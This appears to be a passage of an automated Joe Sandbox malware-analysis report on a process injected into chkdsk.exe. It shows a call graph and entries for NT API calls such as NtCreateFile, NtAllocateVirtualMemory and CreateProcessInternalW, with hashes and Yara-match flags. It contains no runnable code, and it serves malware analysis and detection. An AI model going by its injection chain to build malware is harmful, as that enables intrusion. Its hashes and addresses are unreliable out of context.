505abf0 LdrLoadDll 98649->98650 98651 505aeac 98650->98651 98651->98430 98653 505af20 LdrLoadDll 98652->98653 98654 5059e9c 98653->98654 98679 5942df0 LdrInitializeThunk 98654->98679 98655 5059eb3 98655->98360 98657->98428 98659 505cf06 98658->98659 98660 505cf00 98658->98660 98661 505bf50 2 API calls 98659->98661 98660->98535 98662 505cf2c 98661->98662 98662->98535 98664 505cf90 98663->98664 98665 505bf50 2 API calls 98664->98665 98668 505cfed 98664->98668 98666 505cfca 98665->98666 98667 505bd80 2 API calls 98666->98667 98667->98668 98668->98543 98670 5054324 98669->98670 98671 505bd80 2 API calls 98669->98671 98670->98554 98671->98670 98672->98540 98674 505ac0b 98673->98674 98675 5054e40 LdrLoadDll 98674->98675 98676 505ac2b 98675->98676 98677 5054e40 LdrLoadDll 98676->98677 98678 505acd7 98676->98678 98677->98678 98678->98576 98679->98655 98681 5942c11 98680->98681 98682 5942c1f LdrInitializeThunk 98680->98682 98681->98436 98682->98436 98684 505af20 LdrLoadDll 98683->98684 98685 505a64c RtlFreeHeap 98684->98685 98685->98440 98687 5047eb0 98686->98687 98688 5047eab 98686->98688 98689 505bd00 2 API calls 98687->98689 98688->98368 98692 5047ed5 98689->98692 98690 5047f38 98690->98368 98691 5059e80 2 API calls 98691->98692 98692->98690 98692->98691 98693 5047f3e 98692->98693 98698 505bd00 2 API calls 98692->98698 98702 505a580 98692->98702 98694 5047f64 98693->98694 98696 505a580 2 API calls 98693->98696 98694->98368 98697 5047f55 98696->98697 98697->98368 98698->98692 98700 504817e 98699->98700 98701 505a580 2 API calls 98699->98701 98700->98329 98701->98700 98703 505a59c 98702->98703 98704 505af20 LdrLoadDll 98702->98704 98707 5942c70 LdrInitializeThunk 98703->98707 98704->98703 98705 505a5b3 98705->98692 98707->98705 98709 505b583 98708->98709 98710 504ace0 LdrLoadDll 98709->98710 98711 5049c3a 98710->98711 98711->98335 98714 504b053 98712->98714 98713 504b0d0 98713->98342 98714->98713 98728 5059c50 LdrLoadDll 98714->98728 98717 505af20 LdrLoadDll 98716->98717 98718 504f1ab 98717->98718 98718->98350 98719 505a790 98718->98719 98720 505a7af LookupPrivilegeValueW 98719->98720 98721 505af20 LdrLoadDll 98719->98721 98720->98347 98721->98720 98723 505a236 98722->98723 98724 505af20 LdrLoadDll 98723->98724 98725 505a23c 98724->98725 98729 5942ea0 LdrInitializeThunk 98725->98729 98726 505a25b 98726->98346 98728->98713 98729->98726 98731 504b1e0 98730->98731 98732 504b030 LdrLoadDll 98731->98732 98733 504b1f4 98732->98733 98733->98282 98735 504af24 98734->98735 98807 5059c50 LdrLoadDll 98735->98807 98737 504af5e 98737->98284 98739 504f39c 98738->98739 98740 504b1b0 LdrLoadDll 98739->98740 98741 504f3ae 98740->98741 98808 504f280 98741->98808 98744 504f3c9 98747 505a450 2 API calls 98744->98747 98748 504f3d4 98744->98748 98745 504f3f2 98745->98287 98746 504f3e1 98746->98745 98749 505a450 2 API calls 98746->98749 98747->98748 98748->98287 98749->98745 98751 504f42c 98750->98751 98827 504b2a0 98751->98827 98753 504f43e 98754 504f280 3 API calls 98753->98754 98755 504f44f 98754->98755 98756 504f471 98755->98756 98757 504f459 98755->98757 98758 504f482 98756->98758 98761 505a450 2 API calls 98756->98761 98759 504f464 98757->98759 98760 505a450 2 API calls 98757->98760 98758->98290 98759->98290 98760->98759 98761->98758 98763 504ca96 98762->98763 98764 504caa0 98762->98764 98763->98298 98765 504af00 LdrLoadDll 98764->98765 98766 504cb3e 98765->98766 98767 504cb64 98766->98767 98768 504b030 LdrLoadDll 98766->98768 98767->98298 98769 504cb80 98768->98769 98770 5054a40 8 API calls 98769->98770 98771 504cbd5 98770->98771 98771->98298 98773 504d636 98772->98773 98774 504b030 LdrLoadDll 98773->98774 98775 504d64a 98774->98775 98831 504d300 98775->98831 98777 504908b 98778 504cbf0 98777->98778 98779 504cc16 98778->98779 98780 504b030 LdrLoadDll 98779->98780 98781 504cc99 98779->98781 98780->98781 98782 504b030 LdrLoadDll 98781->98782 98783 504cd06 98782->98783 98784 504af00 LdrLoadDll 98783->98784 98785 504cd6f 98784->98785 98786 504b030 LdrLoadDll 98785->98786 98787 504ce1f 98786->98787 98787->98311 98860 504f6c0 98788->98860 98790 5048f25 98790->98267 98791 5048d14 98791->98790 98865 5054390 98791->98865 98793 5048d70 98793->98790 98868 5048ab0 98793->98868 98796 505cef0 2 API calls 98797 5048db2 98796->98797 98798 505d020 3 API calls 98797->98798 98802 5048dc7 98798->98802 98799 5047ea0 4 API calls 98799->98802 98802->98790 98802->98799 98803 504c7a0 18 API calls 98802->98803 98804 5048160 2 API calls 98802->98804 98873 504f660 98802->98873 98877 504f070 21 API calls 98802->98877 98803->98802 98804->98802 98805->98289 98806->98308 98807->98737 98809 504f29a 98808->98809 98817 504f350 98808->98817 98810 504b030 LdrLoadDll 98809->98810 98811 504f2bc 98810->98811 98818 5059f00 98811->98818 98813 504f2fe 98814 504f344 98813->98814 98821 5059f40 98813->98821 98816 505a450 2 API calls 98814->98816 98816->98817 98817->98744 98817->98746 98819 505af20 LdrLoadDll 98818->98819 98820 5059f1c 98819->98820 98820->98813 98822 5059f5c 98821->98822 98823 505af20 LdrLoadDll 98821->98823 98826 59435c0 LdrInitializeThunk 98822->98826 98823->98822 98824 5059f73 98824->98814 98826->98824 98828 504b2c7 98827->98828 98829 504b030 LdrLoadDll 98828->98829 98830 504b303 98829->98830 98830->98753 98832 504d317 98831->98832 98840 504f700 98832->98840 98836 504d38b 98837 504d392 98836->98837 98851 505a260 LdrLoadDll 98836->98851 98837->98777 98839 504d3a5 98839->98777 98841 504f725 98840->98841 98852 50481a0 98841->98852 98843 504f749 98844 504d35f 98843->98844 98845 5054a40 8 API calls 98843->98845 98847 505bd80 2 API calls 98843->98847 98859 504f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 98843->98859 98848 505a6a0 98844->98848 98845->98843 98847->98843 98849 505a6bf CreateProcessInternalW 98848->98849 98850 505af20 LdrLoadDll 98848->98850 98849->98836 98850->98849 98851->98839 98853 504829f 98852->98853 98854 50481b5 98852->98854 98853->98843 98854->98853 98855 5054a40 8 API calls 98854->98855 98856 5048222 98855->98856 98857 505bd80 2 API calls 98856->98857 98858 5048249 98856->98858 98857->98858 98858->98843 98859->98843 98861 504f6df 98860->98861 98862 5054e40 LdrLoadDll 98860->98862 98863 504f6e6 SetErrorMode 98861->98863 98864 504f6ed 98861->98864 98862->98861 98863->98864 98864->98791 98878 504f490 98865->98878 98867 50543b6 98867->98793 98869 505bd00 2 API calls 98868->98869 98872 5048ad5 98868->98872 98869->98872 98870 5048cea 98870->98796 98872->98870 98897 5059840 98872->98897 98874 504f673 98873->98874 98945 5059e50 98874->98945 98877->98802 98879 504f4ad 98878->98879 98885 5059f80 98879->98885 98882 504f4f5 98882->98867 98886 505af20 LdrLoadDll 98885->98886 98887 5059f9c 98886->98887 98895 5942f30 LdrInitializeThunk 98887->98895 98888 504f4ee 98888->98882 98890 5059fd0 98888->98890 98891 5059fec 98890->98891 98892 505af20 LdrLoadDll 98890->98892 98896 5942d10 LdrInitializeThunk 98891->98896 98892->98891 98893 504f51e 98893->98867 98895->98888 98896->98893 98898 505bf50 2 API calls 98897->98898 98899 5059857 98898->98899 98918 5049310 98899->98918 98901 5059872 98902 50598b0 98901->98902 98903 5059899 98901->98903 98905 505bd00 2 API calls 98902->98905 98904 505bd80 2 API calls 98903->98904 98906 50598a6 98904->98906 98907 50598ea 98905->98907 98906->98870 98908 505bd00 2 API calls 98907->98908 98909 5059903 98908->98909 98915 5059ba4 98909->98915 98924 505bd40 LdrLoadDll 98909->98924 98911 5059b89 98912 5059b90 98911->98912 98911->98915 98913 505bd80 2 API calls 98912->98913 98914 5059b9a 98913->98914 98914->98870 98916 505bd80 2 API calls 98915->98916 98917 5059bf9 98916->98917 98917->98870 98919 5049335 98918->98919 98920 5049368 98919->98920 98921 504ace0 LdrLoadDll 98919->98921 98923 504938d 98920->98923 98925 504cf10 98920->98925 98921->98920 98923->98901 98924->98911 98926 504cf3c 98925->98926 98927 505a1a0 LdrLoadDll 98926->98927 98928 504cf55 98927->98928 98929 504cf5c 98928->98929 98936 505a1e0 98928->98936 98929->98923 98933 504cf97 98934 505a450 2 API calls 98933->98934 98935 504cfba 98934->98935 98935->98923 98937 505a1fc 98936->98937 98938 505af20 LdrLoadDll 98936->98938 98944 5942ca0 LdrInitializeThunk 98937->98944 98938->98937 98939 504cf7f 98939->98929 98941 505a7d0 98939->98941 98942 505a7ef 98941->98942 98943 505af20 LdrLoadDll 98941->98943 98942->98933 98943->98942 98944->98939 98946 505af20 LdrLoadDll 98945->98946 98947 5059e6c 98946->98947 98950 5942dd0 LdrInitializeThunk 98947->98950 98948 504f69e 98948->98802 98950->98948

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 294 505a320-505a336 295 505a33c-505a371 NtCreateFile 294->295 296 505a337 call 505af20 294->296 296->295
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,05054BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,05054BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0505A36D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction ID: 6144a1bf958d7e219553100655b70cc09cd2437861e4de2f7a4d2c76ddac8891
                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                • Instruction Fuzzy Hash: E6F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 297 505a31b-505a371 call 505af20 NtCreateFile
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,05054BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,05054BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0505A36D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                • Opcode ID: e9a5829f3ecd303d4de4c08122cbe0567727bdbf73d59f25bb96caa6ba1d595f
                                                                                                                • Instruction ID: fbc982228054efc5336b9f9a2b73bbcac058eaada48af573a208f34fb8fa8446
                                                                                                                • Opcode Fuzzy Hash: e9a5829f3ecd303d4de4c08122cbe0567727bdbf73d59f25bb96caa6ba1d595f
                                                                                                                • Instruction Fuzzy Hash: 6BF0CFB6205108AFDB08CF88DC95EEB77AEEF8C314F158248FA0D97254C630E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 357 505a44a-505a44d 358 505a3f0-505a419 NtReadFile 357->358 359 505a44f 357->359 360 505a4a6-505a4bd 359->360 361 505a451-505a479 call 505af20 NtClose 359->361
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(05054D62,5EB65239,FFFFFFFF,05054A21,?,?,05054D62,?,05054A21,FFFFFFFF,5EB65239,05054D62,?,00000000), ref: 0505A415
                                                                                                                • NtClose.NTDLL(05054D40,?,?,05054D40,00000000,FFFFFFFF), ref: 0505A475
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 752142053-0
                                                                                                                • Opcode ID: 71eea9d347804ebae2e05baf8317c3e5ecd9961a6bd74b960778a500f834e6ea
                                                                                                                • Instruction ID: 02b34a4d3272c4289c22c45b0222ec89ddcc53d90894ff6f96720696778bf341
                                                                                                                • Opcode Fuzzy Hash: 71eea9d347804ebae2e05baf8317c3e5ecd9961a6bd74b960778a500f834e6ea
                                                                                                                • Instruction Fuzzy Hash: C3111BB6204104AFDB14DF98EC84DEB77ADEF8C320B148699FA5C87205C630E8118BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(05054D62,5EB65239,FFFFFFFF,05054A21,?,?,05054D62,?,05054A21,FFFFFFFF,5EB65239,05054D62,?,00000000), ref: 0505A415
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction ID: 332ebae7e90919f91c538a770ace330bea90c7ef174d7cd3372eb0175b5b8d3f
                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                • Instruction Fuzzy Hash: 47F0A4B6200208ABCB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,05042D11,00002000,00003000,00000004), ref: 0505A539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 73c602d769694cb1c91124c880e51f2dc647e8a9c922d89ae00fb039a20c829f
                                                                                                                • Instruction ID: 42c3b07814e33cf88bf8e61bd64ba1e0aface362881520c708b1860faa09f5b8
                                                                                                                • Opcode Fuzzy Hash: 73c602d769694cb1c91124c880e51f2dc647e8a9c922d89ae00fb039a20c829f
                                                                                                                • Instruction Fuzzy Hash: 6DF01CB6200108BFDB14DF99DC81EEB77ADEF88354F158248FE0997241C634E811CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,05042D11,00002000,00003000,00000004), ref: 0505A539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction ID: 9adf632ba302c1c35e066c27d3a4af1b01408d3c9ff7956aead22c22bc70ca3c
                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                • Instruction Fuzzy Hash: 3DF015B6200208ABCB14DF89DC81EEB77ADAF88654F118248BE0997241C630F810CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(05054D40,?,?,05054D40,00000000,FFFFFFFF), ref: 0505A475
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction ID: a0b55d64daaa36fd67dd7f1a73106a1fa037fc5136af46ec6f418c8f9b530ace
                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                • Instruction Fuzzy Hash: 90D01776200214ABD710EBD8DC89FEB7BACEF48660F154599BA199B242C530FA0087E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 938a65ae293c412d44c9d4ddd76dc487af48008b5bcab7ce07d05d73e6d8262e
                                                                                                                • Instruction ID: 1b9da8c4d85267cf480581032d51a445c7408a26e8903cd9ace76f5b67c340e2
                                                                                                                • Opcode Fuzzy Hash: 938a65ae293c412d44c9d4ddd76dc487af48008b5bcab7ce07d05d73e6d8262e
                                                                                                                • Instruction Fuzzy Hash: DA900222242541525545F1584448507405A97E02517E5C012B5414950C85269966DB21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2f998f02f57af5e7094e6c0d26689a4dd88f578c1ab9a2adcafbc5521daf64fe
                                                                                                                • Instruction ID: be647d0c75470c251c75e0b4ece5f5fe043136d3a3be524e6d70dae338c148ce
                                                                                                                • Opcode Fuzzy Hash: 2f998f02f57af5e7094e6c0d26689a4dd88f578c1ab9a2adcafbc5521daf64fe
                                                                                                                • Instruction Fuzzy Hash: 5B90023220150413D111B1584548707005D87D0251FE5C412B4424558D96568A62A721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 26713c9fb258b0a17047a2ee1486f46ce57e0ba5f238be8f5e52cfc951be8da0
                                                                                                                • Instruction ID: 4ff2af41ed3f784fa0393cde8aae796feaeba2d725fabf5459b10c019f799563
                                                                                                                • Opcode Fuzzy Hash: 26713c9fb258b0a17047a2ee1486f46ce57e0ba5f238be8f5e52cfc951be8da0
                                                                                                                • Instruction Fuzzy Hash: 7690022A21350002D180B158544C60A005987D1212FE5D415B4015558CC91589795721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7ff0f0dd20ea5730163283a1755401e286aab50e5115ffe51cb2073491f1f002
                                                                                                                • Instruction ID: 14ed3e15ded38117b897ff5d3384cb6eb9e6d01bc2f65e7c6332de230049674f
                                                                                                                • Opcode Fuzzy Hash: 7ff0f0dd20ea5730163283a1755401e286aab50e5115ffe51cb2073491f1f002
                                                                                                                • Instruction Fuzzy Hash: 5090023220150402D100B598544C646005987E0311FA5D011B9024555EC66589A16731
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2b2ca079805d56084815dc228d54cfbf9fb2859058fbc9f97503682ef58006bb
                                                                                                                • Instruction ID: 62549b92d4f88bc601ad4dca4413e04987e4166f4bc021d6e9349c2da3a1c3a6
                                                                                                                • Opcode Fuzzy Hash: 2b2ca079805d56084815dc228d54cfbf9fb2859058fbc9f97503682ef58006bb
                                                                                                                • Instruction Fuzzy Hash: F490023220158802D110B158844874A005987D0311FA9C411B8424658D869589A17721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1244968902c549f11598fcc0e48a97689518d84bc11ff5ae16e661802508f1be
                                                                                                                • Instruction ID: 86c6e3e1f3966d2c4dd1a274daf81ed207e0e85d8dfa37a164a3f5ed8ee67a5e
                                                                                                                • Opcode Fuzzy Hash: 1244968902c549f11598fcc0e48a97689518d84bc11ff5ae16e661802508f1be
                                                                                                                • Instruction Fuzzy Hash: 8E90023220150842D100B1584448B46005987E0311FA5C016B4124654D8615C9617B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: db066e6848e51ae5110a75721d23429d5f3378042d27ec55354c18e1c5563c05
                                                                                                                • Instruction ID: 9ce28d9c8d8a6b76d946c51a66e1b43a6f80cf36ffe1aa84ee6716c2ef62c097
                                                                                                                • Opcode Fuzzy Hash: db066e6848e51ae5110a75721d23429d5f3378042d27ec55354c18e1c5563c05
                                                                                                                • Instruction Fuzzy Hash: FD900222211D0042D200B5684C58B07005987D0313FA5C115B4154554CC91589715B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 02ba8b9b8ef05d61a8e7064140c4d58a6ad6764b89dbbdd8f07cc706d5f1affc
                                                                                                                • Instruction ID: 42c4c4274cb7ac7236f34e3680f15adfc197ceaae9343e8153e3a7e855ed961e
                                                                                                                • Opcode Fuzzy Hash: 02ba8b9b8ef05d61a8e7064140c4d58a6ad6764b89dbbdd8f07cc706d5f1affc
                                                                                                                • Instruction Fuzzy Hash: 3B90026234150442D100B1584458B060059C7E1311FA5C015F5064554D8619CD626726
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
